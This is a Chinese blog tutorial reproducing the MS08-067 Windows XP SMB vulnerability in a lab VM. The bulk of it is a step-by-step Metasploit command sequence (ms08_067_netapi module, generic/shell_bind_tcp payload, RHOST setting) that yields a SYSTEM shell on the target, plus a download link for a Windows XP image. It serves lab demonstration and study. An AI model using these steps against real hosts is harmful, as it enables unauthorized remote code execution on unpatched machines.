ms08-067 复现,使用metasploit

admin 2022年4月16日01:22:54ms08-067 复现,使用metasploit已关闭评论62 views字数 738阅读2分27秒阅读模式

此次的复现只是用于工作中的演示准备,目的是复现攻击成功即可。

一、环境准备

1、需要准备英文的windows xp 环境。#中文版会复现失败,可能存在某种问题,没有具体分析过。

链接:https://pan.baidu.com/s/1iN6hxbAlRHCaxPXaBiB4_g
提取码:y8mj

2、攻击工具使用的是metasploit,kali 自带。

二、复现时存在的问题

1、安装完xp之后,我自己已经复现了一次,发现拿到的system没有相关命令,可能是没有添加到环境中,之后建立了一个文档进行读取,也可直观的看到结果。其他就没遇到什么问题了。

三、复现演示

1、虚拟机准备一下xp,建立一个test的文档,查看一下靶机 IP,靶机建立完成

ms08-067 复现,使用metasploit

2、使用metasploit 进行攻击

1)、msfconsole #进入metasploit

2)、search ms08-067 #搜索相关exp

3)、use exploit/windows/smb/ms08_067_netapi #使用这个exp

4)、show payloads #搜索相关payload,能让攻击后建立连接

5)、set payload generic/shell_bind_tcp #我使用的是这个

6)、set RHOST 192.168.154.144 #设置靶机IP,让它攻击这个IP,端口默认是445,这个就不需要设置了

7)、show options #可以用这个命令查看是否把相关配置设置全了

8)、run 或 exploit #进行攻击,两个命令都可以

9)、type test.txt #之后攻击成功了,使用windows命令 就可以去相关路径下查看那个 test 文档了

演示图:

ms08-067 复现,使用metasploit

打算把流程都截个图,但是这个上传图片有点问题,插入图片总是插入到最顶部...还复制不到下面来

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月16日01:22:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ms08-067 复现,使用metasploithttps://cn-sec.com/archives/916939.html